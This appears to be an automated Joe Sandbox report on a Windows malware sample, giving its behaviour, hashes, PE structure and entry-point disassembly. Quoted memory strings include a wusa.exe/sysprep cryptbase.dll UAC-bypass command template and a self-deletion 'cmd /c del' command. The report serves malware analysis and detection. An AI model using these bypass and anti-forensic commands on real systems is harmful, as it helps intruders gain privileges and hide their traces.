Analysis Report WBKDqSfWLj.exe

Overview

General Information

Joe Sandbox Version:	24.0.0
Analysis ID:	716914
Start date:	19.11.2018
Start time:	21:56:02
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 5m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	WBKDqSfWLj.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.evad.winEXE@5/2@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 21 Number of non-executed functions: 38
Cookbook Comments:	Adjust boot time Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, conhost.exe, svchost.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	64	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample might require command line arguments, analyze it with the command line cookbook

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Command-Line Interface1	Winlogon Helper DLL	Process Injection1	Software Packing1	Credential Dumping	Process Discovery1	Application Deployment Software	Data from Local System	Data Compressed	Data Obfuscation
Replication Through Removable Media	Service Execution	Port Monitors	Accessibility Features	Process Injection1	Network Sniffing	Security Software Discovery11	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Fallback Channels
Drive-by Compromise	Windows Management Instrumentation	Accessibility Features	Path Interception	File Deletion1	Input Capture	System Information Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol

Signature Overview

Click to jump to signature section

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Code function: 1_2_00DB259B FindFirstFileA,FindClose,		1_2_00DB259B
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Code function: 2_2_00D3259B FindFirstFileA,FindClose,		2_2_00D3259B

System Summary:

Creates mutexes

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Mutant created: \Sessions\2\BaseNamedObjects\Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}

Sample file is different than original file name gathered from version info

Show sources

Source: WBKDqSfWLj.exe, 00000001.00000002.1213976947.009A0000.00000002.sdmp	Binary or memory string: System.OriginalFileName vs WBKDqSfWLj.exe
Source: WBKDqSfWLj.exe, 00000001.00000002.1214215571.00A50000.00000008.sdmp	Binary or memory string: originalfilename vs WBKDqSfWLj.exe
Source: WBKDqSfWLj.exe, 00000001.00000002.1214215571.00A50000.00000008.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs WBKDqSfWLj.exe
Source: WBKDqSfWLj.exe, 00000001.00000002.1214228725.00A70000.00000008.sdmp	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs WBKDqSfWLj.exe

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

File read: C:\Users\user\Desktop\WBKDqSfWLj.exe

Jump to behavior

Spawns drivers

Show sources

Source: unknown

Driver loaded: C:\Windows\system32\drivers\WudfPf.sys

Classification label

Show sources

Source: classification engine

Classification label: mal64.evad.winEXE@5/2@0/0

Contains functionality to enum processes or threads

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB1C33 CreateToolhelp32Snapshot,Thread32First,CloseHandle,GetCurrentProcessId,OpenThread,SuspendThread,CloseHandle,Thread32Next,GetLastError,CloseHandle,GetLastError,

1_2_00DB1C33

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB13D0 FindResourceA,LoadResource,LockResource,

1_2_00DB13D0

Creates temporary files

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

File created: C:\Users\user~1\AppData\Local\Temp\cnwog.exe

Jump to behavior

Found command line output

Show sources

Source: C:\Windows\System32\cmd.exe

Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d...........0.(.O.....V.ZJ....T.0.Q.#v..0......."vd.0.&...`.....,.....

Jump to behavior

PE file has an executable .text section and no other executable section

Show sources

Source: WBKDqSfWLj.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads ini files

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\WBKDqSfWLj.exe 'C:\Users\user\Desktop\WBKDqSfWLj.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\cnwog.exe 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL
Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Process created: C:\Users\user\AppData\Local\Temp\cnwog.exe 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: WBKDqSfWLj.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Detected packer (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Unpacked PE file: 1.2.WBKDqSfWLj.exe.400000.1.unpack

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB1903 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,

1_2_00DB1903

Persistence and Installation Behavior:

Windows Update Standalone Installer command line found (may be used to bypass UAC)

Show sources

Source: WBKDqSfWLj.exe	Memory string: .exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep
Source: cnwog.exe	Memory string: cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep
Source: cnwog.exe, 00000002.00000002.1212803884.00D31000.00000020.sdmp	Memory string: HvCLIENT32"%s" /exploit"%s" /uacGlobal\AtomFunsysprep.exelogonui.exeutilman.exeuser32.dllwsprintfAwvsprintfAmsvcrt.dll_vscprintf ComSpec/c del %s >> NULGlobal\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}/executable/uac/exploit/runmainadvapi32.dllAddMandatoryAcecmd.exe /C %scmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep\system32\sysprep\cryptbase.dll\system32\sysprep\sysprep.exemakecab.exe /V1 %s %s\cryptbase.msu\cryptbase.dll\%.8x.tmpkernel32.dllIsWow64ProcessWinExecLoadLibraryA.rsrc\uxtheme.dllj
Source: cnwog.exe, 00000002.00000000.1210833158.00D31000.00000020.sdmp	Memory string: DTDhD FCLIENT32"%s" /exploit"%s" /uacGlobal\AtomFunsysprep.exelogonui.exeutilman.exeuser32.dllwsprintfAwvsprintfAmsvcrt.dll_vscprintf ComSpec/c del %s >> NULGlobal\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}/executable/uac/exploit/runmainadvapi32.dllAddMandatoryAcecmd.exe /C %scmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep\system32\sysprep\cryptbase.dll\system32\sysprep\sysprep.exemakecab.exe /V1 %s %s\cryptbase.msu\cryptbase.dll\%.8x.tmpkernel32.dllIsWow64ProcessWinExecLoadLibraryA.rsrc\uxtheme.dllj

Drops PE files

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

File created: C:\Users\user~1\AppData\Local\Temp\cnwog.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL			Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_1-1574
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_2-1405

Found evasive API chain checking for user administrative privileges

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_1-1411
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_2-1241

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB1C33 CreateToolhelp32Snapshot,Thread32First,CloseHandle,GetCurrentProcessId,OpenThread,SuspendThread,CloseHandle,Thread32Next,GetLastError,CloseHandle,GetLastError,

1_2_00DB1C33

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_1-1701
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_2-1432

Found evasive API chain checking for process token information

Show sources

Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_2-1303
Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-1454

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Code function: 1_2_00DB259B FindFirstFileA,FindClose,		1_2_00DB259B
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Code function: 2_2_00D3259B FindFirstFileA,FindClose,		2_2_00D3259B

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: WBKDqSfWLj.exe, 00000001.00000002.1212775221.00470000.00000004.sdmp	Binary or memory string: vmbusres.dll/
Source: WBKDqSfWLj.exe, 00000001.00000002.1212775221.00470000.00000004.sdmp	Binary or memory string: vmbusres.dll/:2m

Program exit points

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	API call chain: ExitProcess graph end node	graph_1-1565
Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	API call chain: ExitProcess graph end node	graph_1-1399
Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	API call chain: ExitProcess graph end node	graph_1-1445
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	API call chain: ExitProcess graph end node	graph_2-1229
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	API call chain: ExitProcess graph end node	graph_2-1275

Anti Debugging:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB1C33 CreateToolhelp32Snapshot,Thread32First,CloseHandle,GetCurrentProcessId,OpenThread,SuspendThread,CloseHandle,Thread32Next,GetLastError,CloseHandle,GetLastError,

1_2_00DB1C33

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB1903 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,

1_2_00DB1903

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Code function: 1_2_00DB3E80 mov eax, dword ptr fs:[00000030h]		1_2_00DB3E80
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Code function: 2_2_00D33E80 mov eax, dword ptr fs:[00000030h]		2_2_00D33E80

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe	Process created: C:\Users\user\AppData\Local\Temp\cnwog.exe 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cnwog.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL			Jump to behavior

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB2604 AllocateAndInitializeSid,_memset,GetModuleHandleA,SetEntriesInAclA,LocalAlloc,LocalAlloc,LocalFree,_memset,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LoadLibraryA,GetProcAddress,LocalAlloc,InitializeAcl,AllocateAndInitializeSid,SetSecurityDescriptorSacl,GetLastError,FreeSid,GetLastError,LocalFree,GetLastError,GetLastError,LocalFree,GetLastError,LocalFree,GetLastError,FreeSid,GetLastError,

1_2_00DB2604

Contains functionality to create a new security descriptor

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

1_2_00DB2604

Language, Device and Operating System Detection:

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\WBKDqSfWLj.exe

Code function: 1_2_00DB29C6 _memset,GetVersionExA,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,CloseHandle,CloseHandle,GetTokenInformation,CreateWellKnownSid,CheckTokenMembership,GetLastError,CloseHandle,IsUserAnAdmin,CloseHandle,GetLastError,IsUserAnAdmin,

1_2_00DB29C6

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
21:56:14	API Interceptor	1x Sleep call for process: WBKDqSfWLj.exe modified
21:56:14	API Interceptor	1x Sleep call for process: cnwog.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

WBKDqSfWLj.exe (PID: 1628 cmdline: 'C:\Users\user\Desktop\WBKDqSfWLj.exe' MD5: B46BFD40F6379DB41AC99FF3103D81B9)

cnwog.exe (PID: 1840 cmdline: 'C:\Users\user~1\AppData\Local\Temp\cnwog.exe' MD5: 658965F6B9EFC9114BA4EB2C7DBC85E8)

cmd.exe (PID: 2920 cmdline: C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL MD5: AD7B9C14083B52BC532FBA5948342B98)

WudfPf.sys (PID: 4 cmdline: unknown MD5: 06E6F32C8D0A3F66D956F57B43A2E070)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\cnwog.exe
Process:	C:\Users\user\Desktop\WBKDqSfWLj.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	22542
Entropy (8bit):	6.0729426879035495
Encrypted:	false
MD5:	658965F6B9EFC9114BA4EB2C7DBC85E8
SHA1:	10CB98E5E3EA977B35E00C3535938B6FEF302D15
SHA-256:	462E248196E3D46D222D5B95AA2AE4433AE5F1DD418D80A4BB326E5A67D02908
SHA-512:	21B9A6E3F7FB76276881962BB29999E84D00CBF8E4DFC9282F91C5A295F5430609757D336BA9657F024A2F8DD74A2379D65770456C77976351B165DFB46F38A1
Malicious:	true
Reputation:	low

\Device\Null
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	48
Entropy (8bit):	4.605388542207535
Encrypted:	false
MD5:	6E7658E1F23E564517BA9DAAB4E630E6
SHA1:	59DB5A68927447352D873DB53C772AAA8F7469CF
SHA-256:	AF2A102EFE06A8140E57C8C8030C6D69818FB3BD5B18FA78D1AC9A2663E958EC
SHA-512:	F40DBB9285C42865187F6F08A9DB8E0B40BFEFB7DB189C444EFC85A9CCBFEA31C3CD1948691D622FAC33F9FEA834683C58E02DE527A7CF69CF0DA6C8FFA9DD52
Malicious:	false
Reputation:	low

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):	6.078333712055946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WBKDqSfWLj.exe
File size:	22456
MD5:	b46bfd40f6379db41ac99ff3103d81b9
SHA1:	6d1027120c6c247c1ac85c759456c7e351ac4e43
SHA256:	19a962538a6b7b96a33360530a875df7a07f42d3d72a5904485405e236be0ffc
SHA512:	d88bfcd7a94db635818067bc18e0e1f4849b5a7e66ca8505e8004c7c1a3c858b2f9baff8d0c6f5894fd6c5f1226f9712ec3a78d2f233a9da015acd44867758ac
SSDEEP:	384:6B7H4slp4mvFw8hkt2C8oBl/MCyaZAR3rfD8G0r1wk3qeEW0/T8w/fF:6B7HBXFw82t2C80lyaZ4jX05Rfw/9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ..Mdg..dg..dg..C...fg..m.Y.mg..dg..=g....`.ag....T.lg....a.hg....P.eg....W.eg..Richdg..................PE..L......S...........

File Icon


Icon Hash:	aab2e3e39383aa00

Static PE Info

General
Entrypoint:	0x401fb2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x53D8C5B8 [Wed Jul 30 10:15:20 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	719981e4a07a182166e9d536a1267a59

Entrypoint Preview

Instruction
push esi
mov esi, dword ptr [esp+08h]
push 00000002h
push esi
call dword ptr [004010ECh]
test eax, eax
jne 1BD7EDF2h
mov eax, 00005A4Dh
cmp word ptr [esi], ax
jne 1BD7EDE8h
mov eax, dword ptr [esp+0Ch]
cmp eax, 01h
je 1BD7EDD0h
test eax, eax
je 1BD7EDCCh
cmp eax, 02h
je 1BD7EDC7h
cmp eax, 03h
jne 1BD7EDD1h
push dword ptr [esp+10h]
push eax
push esi
call 1BD7EC6Eh
pop esi
retn 000Ch
call 1BD7EAA6h
push eax
call dword ptr [0040106Ch]
int3
mov eax, dword ptr [esp+04h]
xor ecx, ecx
mov dword ptr [00405030h], eax
inc ecx
mov eax, 00405030h
push esi
mov edx, dword ptr [eax]
mov esi, edx
shr esi, 1Eh
xor esi, edx
imul esi, esi, 6C078965h
add esi, ecx
mov dword ptr [eax+04h], esi
add eax, 04h
inc ecx
cmp eax, 004059ECh
jl 1BD7EDA3h
mov dword ptr [00405020h], ecx
pop esi
retn 0004h
cmp dword ptr [004059F0h], 00000000h
jne 1BD7EDDEh
push 004011C0h
push 004011B4h
call dword ptr [004010F0h]
push eax
call dword ptr [004010F4h]
mov dword ptr [004059F0h], eax
ret
cmp dword ptr [004059F4h], 00000000h
jne 1BD7EDDEh
push 004011CCh

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[IMP] VS2005 build 50727
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3eac	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7000	0xa58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0x2a4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x158	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3660	0x3800	False	0.588936941964	ump; data	6.37760206704	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x5000	0xa24	0x200	False	0.0703125	ump; data	0.199775656087	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.CRT	0x6000	0x4	0x200	False	0.03125	ump; Non-ISO extended-ASCII text, with no line terminators	0.0611628522412	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x7000	0xa58	0xc00	False	0.792643229167	ump; data	6.85564450142	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0x3f8	0x400	False	0.634765625	ump; data	5.0141806425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_RCDATA	0x7220	0x834	ump; data	English	United States
RT_MANIFEST	0x70c0	0x15c	ump; ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	OpenThread, CloseHandle, Thread32First, CreateToolhelp32Snapshot, LocalFree, Sleep, GetModuleFileNameA, GetModuleHandleA, GetCommandLineA, GetCurrentProcess, GetVersionExA, SetEvent, OpenEventA, ExitProcess, GetCurrentProcessId, LocalAlloc, WinExec, lstrcatA, GetEnvironmentVariableA, GetShortPathNameA, CreateMutexA, SuspendThread, GetTickCount, FlushFileBuffers, WriteFile, CreateFileA, ReadFile, GetFileSize, FindClose, FindFirstFileA, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, Process32Next, Process32First, GetStartupInfoA, GetWindowsDirectoryA, DeleteFileA, GetSystemDirectoryA, GetTempPathA, CopyFileA, CreateEventA, MoveFileA, Thread32Next, FreeLibrary, IsBadReadPtr, LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, VirtualQuery, GetLastError, FindResourceA, LoadResource, GetCommandLineW, LockResource, IsProcessorFeaturePresent
USER32.dll	LockWorkStation, UnregisterClassA, wsprintfA, RegisterWindowMessageA, GetClipboardFormatNameA, RegisterClassExA, SendInput
ADVAPI32.dll	OpenProcessToken, AllocateAndInitializeSid, SetEntriesInAclA, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, InitializeAcl, SetSecurityDescriptorSacl, FreeSid, GetTokenInformation, GetSidSubAuthority, GetSidSubAuthorityCount, CheckTokenMembership, CreateWellKnownSid
SHELL32.dll	CommandLineToArgvW
imagehlp.dll	CheckSumMappedFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

IRP Handler

Handler Function	Driver	Address	Type
IRP_MJ_QUERY_VOLUME_INFORMATION	\Driver\WudfPf	94B968CC	new
IRP_MJ_WRITE	\Driver\WudfPf	94B968CC	new
IRP_MJ_SYSTEM_CONTROL	\Driver\WudfPf	94B968CC	new
IRP_MJ_CREATE_NAMED_PIPE	\Driver\WudfPf	94B968CC	new
IRP_MJ_POWER	\Driver\WudfPf	94B968CC	new
IRP_MJ_SET_EA	\Driver\WudfPf	94B968CC	new
IRP_MJ_QUERY_QUOTA	\Driver\WudfPf	94B968CC	new
IRP_MJ_DEVICE_CHANGE	\Driver\WudfPf	94B968CC	new
IRP_MJ_CLOSE	\Driver\WudfPf	94B968CC	new
IRP_MJ_READ	\Driver\WudfPf	94B968CC	new
IRP_MJ_SET_VOLUME_INFORMATION	\Driver\WudfPf	94B968CC	new
IRP_MJ_FILE_SYSTEM_CONTROL	\Driver\WudfPf	94B968CC	new
IRP_MJ_QUERY_SECURITY	\Driver\WudfPf	94B968CC	new
IRP_MJ_DEVICE_CONTROL	\Driver\WudfPf	94B968CC	new
IRP_MJ_DIRECTORY_CONTROL	\Driver\WudfPf	94B968CC	new
IRP_MJ_PNP	\Driver\WudfPf	94B968CC	new
IRP_MJ_SET_INFORMATION	\Driver\WudfPf	94B968CC	new
IRP_MJ_CREATE_MAILSLOT	\Driver\WudfPf	94B968CC	new
IRP_MJ_SHUTDOWN	\Driver\WudfPf	94B968CC	new
IRP_MJ_SET_QUOTA	\Driver\WudfPf	94B968CC	new
IRP_MJ_SET_SECURITY	\Driver\WudfPf	94B968CC	new
IRP_MJ_CREATE	\Driver\WudfPf	94B968CC	new
IRP_MJ_INTERNAL_DEVICE_CONTROL	\Driver\WudfPf	94B968CC	new
IRP_MJ_QUERY_INFORMATION	\Driver\WudfPf	94B968CC	new
IRP_MJ_LOCK_CONTROL	\Driver\WudfPf	94B968CC	new
IRP_MJ_FLUSH_BUFFERS	\Driver\WudfPf	94B968CC	new
IRP_MJ_QUERY_EA	\Driver\WudfPf	94B968CC	new
IRP_MJ_CLEANUP	\Driver\WudfPf	94B968CC	new

New Device

Driver	Device	Attached to (upper)	Attached to (lower)
\Driver\WudfPf	\Device\ProcessManagement	unknown	unknown
\Driver\WudfPf	\Device\WUDFLpcDevice	unknown	unknown

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WBKDqSfWLj.exe PID: 1628 Parent PID: 2260

General

Start time:	21:56:13
Start date:	19/11/2018
Path:	C:\Users\user\Desktop\WBKDqSfWLj.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\WBKDqSfWLj.exe'
Imagebase:	0xdb0000
File size:	22456 bytes
MD5 hash:	B46BFD40F6379DB41AC99FF3103D81B9
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cnwog.exe PID: 1840 Parent PID: 1628

General

Start time:	21:56:14
Start date:	19/11/2018
Path:	C:\Users\user\AppData\Local\Temp\cnwog.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user~1\AppData\Local\Temp\cnwog.exe'
Imagebase:	0xd30000
File size:	22542 bytes
MD5 hash:	658965F6B9EFC9114BA4EB2C7DBC85E8
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2920 Parent PID: 1840

General

Start time:	21:56:14
Start date:	19/11/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
